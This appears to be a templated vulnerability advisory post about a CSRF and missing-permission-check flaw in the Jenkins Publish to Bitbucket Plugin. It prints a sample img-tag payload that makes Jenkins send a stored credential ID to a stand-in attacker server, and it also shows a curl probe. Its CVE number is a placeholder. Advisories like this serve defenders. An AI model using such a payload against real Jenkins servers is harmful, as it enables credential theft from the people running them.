Jenkins Publish to Bitbucket Plugin CSRF and Missing Permissions Check CVE-2025-XXXX (Moderate)

Listen to this Post

The CVE in the Jenkins Publish to Bitbucket Plugin stems from two critical flaws in a specific HTTP endpoint. First, the endpoint lacks any permission check, violating the principle of least privilege. This allows attackers who only have Overall/Read permission, a low-privilege access level, to interact with the endpoint. Second, the endpoint does not require POST requests, making it susceptible to Cross-Site Request Forgery (CSRF). An attacker can trick an authenticated Jenkins user into visiting a malicious webpage. This page would then send a forged GET request to the vulnerable endpoint, forcing the user’s Jenkins instance to connect to an attacker-controlled server. By specifying credentials IDs obtained through other means, the attacker can exfiltrate and capture sensitive credentials stored within the Jenkins credential manager.
Platform: Jenkins Plugin
Version: <= 0.4
Vulnerability : CSRF & Permissions
Severity: Moderate
date: 2025-10-29

Prediction: 2025-11-19

What Undercode Say:

curl -X GET 'http://jenkins-host/jenkins/pluginEndpoint'
<img src="http://jenkins-host/jenkins/pluginEndpoint?url=http://attacker-server.com&credentialId=secret-key" />

How Exploit:

An attacker crafts a malicious HTML page that automatically sends a GET request to the vulnerable Jenkins endpoint when visited by a logged-in Jenkins administrator. This request forces the Jenkins server to transmit sensitive credentials to a server controlled by the attacker.

Protection from this CVE:

No patch available. Immediate mitigation requires restricting plugin access or disabling it until a fix is released. Network segmentation and minimizing user privileges are also critical.

Impact:

Credential Theft. Attackers can exfiltrate credentials stored in Jenkins, potentially leading to further compromise of integrated systems like Bitbucket.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top